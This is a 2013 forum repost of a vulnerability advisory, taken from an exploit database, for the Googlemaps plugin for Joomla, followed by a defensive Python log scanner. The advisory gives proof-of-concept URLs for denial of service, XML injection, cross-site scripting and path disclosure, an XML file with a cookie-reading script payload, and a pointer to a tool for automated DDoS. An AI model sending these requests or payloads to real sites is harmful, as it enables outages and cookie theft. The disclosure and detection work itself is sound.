thehat
Posted August 27, 2013

These are Denial of Service, XML Injection, Cross-Site Scripting and Full path disclosure vulnerabilities in Googlemaps plugin for Joomla.

-------------------------
Affected products:
-------------------------

Vulnerable are Googlemaps plugin for Joomla versions 2.x and 3.x and potentially previous versions. In new version of DAVOSET I'll add a lot of web sites with Googlemaps plugin.

-------------------------
Affected vendors:
-------------------------

Mike Reumer
Googlemaps Plugin - Joomla! Extensions Directory

----------
Details:
----------

Denial of Service (WASC-10):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/large_file

Besides conducting DoS attack manually, it's also possible to conduct automated DoS and DDoS attacks using DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html).

XML Injection (WASC-23):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xml.xml

It's possible to include external xml-files. Which also can be used for XSS attack:

XSS via XML Injection (WASC-23):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xss.xml

File xss.xml:

<?xml version="1.0" encoding="utf-8"?>
<feed>
  <title>XSS</title>
  <entry>
    <div xmlns="http://www.w3.org/1999/xhtml"><script>alert(document.cookie)</script></div>
  </entry>
</feed>

Cross-Site Scripting (WASC-08):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=%3Cbody%20onload=alert(document.cookie)%3E

Full path disclosure (WASC-13):

http://site/plugins/content/plugin_googlemap2_proxy.php

Besides plugin_googlemap2_proxy.php, this also happens in plugin_googlemap3_proxy.php (but it has another path on web sites).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

# 3782C828C3E6E81E 1337day.com [2013-08-28] A70DB80C325E4592 #

Source: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team
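A defender-side check for the request patterns listed in the advisory above, as an added example that is not part of the original post or the plugin's code: it scans web server access logs for requests to the two proxy scripts and labels each one. The combined log format, the `ALLOWED_HOSTS` value, the label names and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script names are from the advisory; match by file name because the
# directory differs between sites and plugin versions.
PROXY_RE = re.compile(r"/plugin_googlemap[23]_proxy\.php$")
# Assumption: the only hosts this site expects the proxy to fetch from.
ALLOWED_HOSTS = {"maps.google.com"}
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(log_line):
    """Label a request to the proxy script; None if the line is unrelated."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    try:
        target = urlsplit(m.group(1))
        if not PROXY_RE.search(target.path):
            return None
        values = parse_qs(target.query).get("url")  # values are percent-decoded
        if not values:
            return "no-url-parameter"   # request shape of the path disclosure
        url = values[0]
        if re.search('[<>"\']', url):
            return "markup-in-url"      # request shape of the reflected XSS
        # The advisory's examples omit the scheme, so supply "//" to parse.
        host = urlsplit(url if "://" in url else "//" + url).hostname or ""
    except ValueError:                  # malformed netloc, e.g. bad brackets
        return "unparseable"
    return "allowed" if host in ALLOWED_HOSTS else "external-fetch"

def scan(lines):
    """Return (label, line) for every proxy request that is not allowed."""
    labelled = ((classify(line), line) for line in lines)
    return [(lab, line) for lab, line in labelled if lab not in (None, "allowed")]

# Constructed sample log lines (documentation IPs, example hosts and paths).
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Aug/2013:10:00:01 +0000] "GET /plugins/content/plugin_googlemap2_proxy.php?url=site2.example/large_file HTTP/1.1" 200 5242880',
    '203.0.113.6 - - [28/Aug/2013:10:00:02 +0000] "GET /plugins/content/plugin_googlemap2_proxy.php?url=%3Cbody%20onload=alert(document.cookie)%3E HTTP/1.1" 200 512',
    '203.0.113.7 - - [28/Aug/2013:10:00:03 +0000] "GET /some/other/path/plugin_googlemap3_proxy.php HTTP/1.1" 200 301',
    '198.51.100.9 - - [28/Aug/2013:10:00:04 +0000] "GET /plugins/content/plugin_googlemap2_proxy.php?url=maps.google.com/maps HTTP/1.1" 200 2048',
    '198.51.100.9 - - [28/Aug/2013:10:00:05 +0000] "GET /index.php HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for label, line in scan(SAMPLE_LOG):
        print(label, "|", line)
```

Both XML cases in the advisory (xml.xml and xss.xml) show up as `external-fetch`, since from the log alone they are indistinguishable from any other fetch of a non-allowed host.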